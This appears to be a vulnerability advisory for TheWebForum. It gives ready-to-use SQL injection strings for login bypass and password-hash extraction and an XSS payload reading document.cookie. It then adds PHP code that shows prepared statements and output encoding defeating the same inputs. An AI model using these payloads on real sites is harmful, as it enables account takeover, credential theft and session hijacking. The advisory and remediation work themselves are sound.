PoC/Exploit for Script Insertion and Auth Bypass in TheWebForum
Published Proof of Concept code - Script Insertion and Auth Bypass in TheWebForum.
- Description: Available
- Solution: Not available - check TheWebForum Group website
Authentication bypass example (SQL Injection):
http://host/twf/login.php
User Name: a' or 'a'='a'/*
Password: anypassword

Get user's password hash example (SQL Injection):
http://host/twf/login.php
User Name: a' union select N,password,3 from users/*
The displayed user name will contain the password hash of the user with ID=N.

JavaScript insertion (XSS):
http://host/twf/register.php
Website value: <script>alert(document.cookie)</script>
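
A defensive counterpart to the three inputs above, as an added example that is not part of the original advisory or of TheWebForum's code: a login lookup that uses a bound parameter, and an encoder for the Website field. The `name` column, the function names, the in-memory SQLite database and the sample user are assumptions made for illustration.

```php
<?php
// Added example, not TheWebForum code. Only the `users` table and its
// `password` column come from the advisory; everything else is assumed.

function find_user(PDO $db, string $name, string $password): ?int
{
    // Bound parameter: quotes and comment markers in $name stay data
    // and never become part of the SQL statement.
    $stmt = $db->prepare('SELECT id, password FROM users WHERE name = ?');
    $stmt->execute([$name]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($password, $row['password'])) {
        return null;
    }
    return (int) $row['id'];
}

function render_website(string $url): string
{
    // Accept only well-formed http(s) URLs, then encode for HTML output.
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    if (filter_var($url, FILTER_VALIDATE_URL) === false
        || !in_array($scheme, ['http', 'https'], true)) {
        return '';
    }
    $safe = htmlspecialchars($url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<a href="' . $safe . '" rel="nofollow noopener">' . $safe . '</a>';
}

// Constructed sample data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT UNIQUE, password TEXT)');
$db->prepare('INSERT INTO users (name, password) VALUES (?, ?)')
   ->execute(['alice', password_hash('correct horse', PASSWORD_DEFAULT)]);

// A legitimate login, followed by the advisory's two User Name values.
var_dump(find_user($db, 'alice', 'correct horse'));
var_dump(find_user($db, "a' or 'a'='a'/*", 'anypassword'));
var_dump(find_user($db, "a' union select N,password,3 from users/*", 'anypassword'));

// The advisory's Website value, followed by an ordinary URL.
var_dump(render_website('<script>alert(document.cookie)</script>'));
var_dump(render_website('http://example.org/?a=1&b=2'));
```

Because the user name is passed as a bound value and the stored hash is only ever compared with password_verify(), neither login input can change the query or surface a hash in the page output.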


